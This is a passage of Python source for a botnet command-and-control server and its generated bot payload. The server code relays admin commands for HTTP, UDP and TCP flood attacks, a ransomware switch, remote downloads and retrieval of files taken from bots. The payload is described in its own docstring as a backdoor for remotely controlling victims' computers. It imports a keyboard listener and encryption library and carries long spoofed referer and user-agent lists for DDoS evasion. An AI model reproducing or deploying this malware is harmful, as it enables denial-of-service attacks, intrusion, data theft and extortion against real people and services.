conn) self.send_to_other("SERVER",name,"Payloads are effective!", conn) else: self.send_to_other("SERVER",name,"The ransomware has been disabled in the config file. Turn the value assigned to 'ransomware_active' to 't'", conn) elif msg.startswith("!download"): try: filename = msg.split()[1] website = msg.split()[2] self.send_to_other("SERVER",self.admin_username,f"Making the bots download contents from '{website}' into file {filename}",self.adminconn) except: self.send_to_other("SERVER",name,"Invalid input! Here is the valid input: !download <filename> <website>", conn) elif msg.startswith('!httpflood'): if self.ddosing: self.send_to_other("SERVER",self.admin_username,"There is already an ongoing DDoS Attack! Please stop the attack if you want to start a new one(input '!stopatk').",self.adminconn) else: msgtobot = msg.split() if self.focusing: self.send_to_other("SERVER",self.admin_username,"You are in focus mode! Only the bot you are focusing will start attacking!",self.adminconn) else: self.ddosing = True try: targ_website = msgtobot[1] atk_delay = float(msgtobot[2]) self.send_to_other("SERVER",self.admin_username,f"Beginning HTTP Flood Attack on {targ_website} with delay of {atk_delay}.",self.adminconn) except: self.send_to_other("SERVER",name,"Invalid input! Here is the valid input: !httpflood <website> <atk_delay>", conn) elif msg.startswith('!udpflood') or msg.startswith("!tcpflood"): if self.ddosing: self.send_to_other("SERVER",self.admin_username,"There is already an ongoing DDoS Attack! Please stop the attack if you want to start a new one(input '!stopatk').",self.adminconn) else: if self.focusing: self.send_to_other("SERVER",self.admin_username,"You are in focus mode! Only the bot you are focusing will start attacking!",self.adminconn) else: self.ddosing = True if msg.startswith('!udpflood'): protocol = "UDP" elif msg.startswith("!tcpflood"): protocol = "TCP" msgtobot = msg.split() try: target = msgtobot[1] try: port = int(msgtobot[2]) except: port = 80 try: delay = float(msgtobot[3]) except: delay = 0 self.send_to_other("SERVER",self.admin_username,f"Beginning {protocol} Flood Attack on {target}:{port} with delay of {delay}.",self.adminconn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !{protocol.lower()}flood <ip> <port> <delay>", conn) if not self.focusing and not self.downloading: if msg.strip() != "": self.log(f"[({datetime.datetime.today()})][({self.admin_username})--->(BOTS)]: {msg}") display_single_msg = False for bot in self.connlist: try: if conn != bot: if msg.startswith("!ransomware") and not self.ransomware_active: pass else: bot.send(msg.encode()) except: pass else: if not self.downloading: if msg.strip() != "": display_single_msg = False self.log(f"[({datetime.datetime.today()})][({self.admin_username})--->({self.focus_botname})]: {msg}") self.focus_conn.send(msg.encode()) elif self.filetransfer: if msg.startswith("!help"): self.adminconn.send(self.file_tranfer_help_msg().encode()) self.log(f"[({datetime.datetime.today()})][(SERVER)--->({self.admin_username})]: Sent the FTP Help message.") elif msg.startswith("!download"): try: filename = self.get_filename(msg) file = open(os.path.join(os.getcwd(),f"{self.ftp_dir}/{filename}"),"rb") file.close() self.send_to_other("SERVER",name, f"Preparing to download file: {file.name}.", conn) self.send_file(file.name, conn) except FileNotFoundError: self.send_to_other("SERVER",name,f"The file specified does not exist!", conn) except Exception as e: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !download <file>", conn) elif msg.startswith("!listdir"): dirlist = os.listdir(path=os.path.join(os.getcwd(), self.ftp_dir)) self.send_to_other("SERVER",name,f"Files extracted from bots: {dirlist}",conn) elif msg.startswith("!stopftp"): self.send_to_other("SERVER",name,"De-Activating FTP Mode. Returning to the Botnet. You will be able to send commands to the bots.",conn) self.filetransfer = False if display_single_msg: if not msg.startswith("!login"): if not msg.startswith("!key") and msg.strip() != "": self.log(f"[({datetime.datetime.today()})][({name})]: {msg}") if conn != self.adminconn: self.adminconn.send(f"\n[({name})]: {msg}".encode()) else: self.log(f"[({datetime.datetime.today()})][({name})]: Attempting to log into the Admin Account.") except Exception as e: if registered: self.log(f"[({datetime.datetime.today()})][(ERROR)]: Closing connection with {name} due to error: {e}") if conn == self.adminconn: self.log(f"[({datetime.datetime.today()})][(INFO)]: The admin has left the Botnet.") self.adminconn = None self.admin_online = False else: try: if registered: self.adminconn.send(f"[(SERVER)]: {name} has disconnected from the Botnet.".encode()) except: pass if conn == self.focus_conn: self.send_to_other("SERVER",self.admin_username,f"The Bot you were focusing on has disconnected from the Botnet, going back to normal.", self.adminconn) self.focusing = False self.focus_conn = None self.focus_botname = "" self.downloading = False try: self.connlist.remove(conn) except: pass conn.close() break def gen_payload(self): """The Payload script is located here. It is generated based on the server variables in the '__init__' function. This is what the bots use to connect to the server. This script is really a backdoor, which opens the victim to having their computer controlled remotely by the admin. There are a lot of referer and useragent tags, and the reason for that is the DDoS Function. If the user, for whatever reason wants to commit a large scale DDoS Attack, they need to have uniqueness with the HTTP Headers, so that it could help confuse the server they are attacking, and eventually bring it down(Servers are really secure nowadays and DDoSing is illegal, so only DDoS Your own servers please). There is also all of the code needed for controlling the bot. The functions are divided into different classes, with the 3 types of DDoS Functions divided into different classes, with the main bot code in one separate class itself.""" payload = """ import socket, threading, os, sys, urllib.request, random, time, shutil, subprocess, sqlite3 try: from cryptography.fernet import Fernet from pynput.keyboard import Listener except: pass class DDoS: def __init__(self, ip, delay): self.ip = ip self.delay = delay self.stopatk = False self.useragents = self.obtain_user_agents() self.referers = self.obtain_referers() self.threader = threading.Thread(target=self.start_thr) self.threader.start() def obtain_referers(self): referers = ['http://www.google.com/?q=', 'http://yandex.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..', 'http://vk.com/profile.php?redirect=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=query?=query=..', 'https://www.google.ru/#hl=ru&newwindow=1?&saf..,or.r_gc.r_pw=?.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=882', 'https://www.google.ru/#hl=ru&newwindow=1&safe..,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=925', 'http://yandex.ru/yandsearch?text=', 'https://www.google.ru/#hl=ru&newwindow=1&safe..,iny+gay+q=pcsny+=;zdr+query?=poxy+pony&gs_l=hp.3.r?=.0i19.505.10687.0.10963.33.29.4.0.0.0.242.4512.0j26j3.29.0.clfh..0.0.dLyKYyh2BUc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp?=?fd2cf4e896a87c19&biw=1389&bih=832', 'http://go.mail.ru/search?mail.ru=1&q=', 'http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..', 'http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..', 'http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..', 'http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..', 'http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..', '/#hl=en-US?&newwindow=1&safe=off&sclient=psy=?-ab&query=%D0%BA%D0%B0%Dq=?0%BA+%D1%83%()_D0%B1%D0%B=8%D1%82%D1%8C+%D1%81bvc?&=query&%D0%BB%D0%BE%D0%BD%D0%B0q+=%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+%D1%87%D0%BB%D0%B5%D0%BD&oq=q=%D0%BA%D0%B0%D0%BA+%D1%83%D0%B1%D0%B8%D1%82%D1%8C+%D1%81%D0%BB%D0%BE%D0%BD%D0%B0+%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D1%DO%D2%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+?%D1%87%D0%BB%D0%B5%D0%BD&gs_l=hp.3...192787.206313.12.206542.48.46.2.0.0.0.190.7355.0j43.45.0.clfh..0.0.ytz2PqzhMAc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=?882', 'http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..', 'http://www.google.ru/url?sa=t&rct=?j&q=&e..', 'http://help.baidu.com/searchResult?keywords=', 'http://www.bing.com/search?q=', 'https://www.yandex.com/yandsearch?text=', 'https://duckduckgo.com/?q=', 'http://www.ask.com/web?q=', 'http://search.aol.com/aol/search?q=', 'https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=', 'https://drive.google.com/viewerng/viewer?url=', 'http://validator.w3.org/feed/check.cgi?url=', 'http://host-tracker.com/check_page/?furl=', 'http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=', 'http://jigsaw.w3.org/css-validator/validator?uri=', 'https://add.my.yahoo.com/rss?url=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=', 'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=', 'http://www.topsiteminecraft.com/site/pinterest.com/search?q=', 'http://eu.battle.net/wow/en/search?q=', 'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=', 'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=', 'http://www.ted.com/search?q=', 'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=', 'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=', 'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=', 'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=', 'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=', 'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=', 'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=', 'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=', 'http://ytmnd.com/search?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=', 'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=', 'http://www.topsiteminecraft.com/site/pinterest.com/search?q=', 'http://eu.battle.net/wow/en/search?q=', 'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=', 'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=', 'http://www.ted.com/search?q=', 'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=', 'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=', 'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=', 'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=', 'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=', 'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=', 'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=', 'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=', 'http://ytmnd.com/search?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=', 'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=', 'http://www.topsiteminecraft.com/site/pinterest.com/search?q=', 'http://eu.battle.net/wow/en/search?q=', 'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=', 'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=', 'http://www.ted.com/search?q=', 'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=', 'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=', 'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=', 'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=', 'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=', 'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=', 'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=', 'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=', 'http://ytmnd.com/search?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=', 'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=', 'http://www.topsiteminecraft.com/site/pinterest.com/search?q=', 'http://eu.battle.net/wow/en/search?q=', 'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=', 'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=', 'http://www.ted.com/search?q=', 'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=', 'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=', 'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=', 'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=', 'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=', 'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=', 'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=', 'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=', 'http://ytmnd.com/search?q=', 'https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=', 'http://www.google.com/?q=', 'https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=', 'https://drive.google.com/viewerng/viewer?url=', 'http://www.google.com/translate?u=', 'https://developers.google.com/speed/pagespeed/insights/?url=', 'http://help.baidu.com/searchResult?keywords=', 'http://www.bing.com/search?q=', 'https://add.my.yahoo.com/rss?url=', 'https://play.google.com/store/search?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q='] return referers def obtain_user_agents(self): user_agents = ['Mozilla/5.0 (Amiga; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14', 'Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en-US; rv:1.8.1.21) Gecko/20090303 SeaMonkey/1.1.15', 'Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14', 'Mozilla/5.0 (Android 2.2; Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4', 'Mozilla/5.0 (BeOS; U; BeOS BeBox; fr; rv:1.9) Gecko/2008052906 BonEcho/2.0', 'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.1) Gecko/20061220 BonEcho/2.0.0.1', 'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.10) Gecko/20071128 BonEcho/2.0.0.10', 'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.17) Gecko/20080831 BonEcho/2.0.0.17', 'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.6) Gecko/20070731 BonEcho/2.0.0.6', 'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.7) Gecko/20070917 BonEcho/2.0.0.7', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; 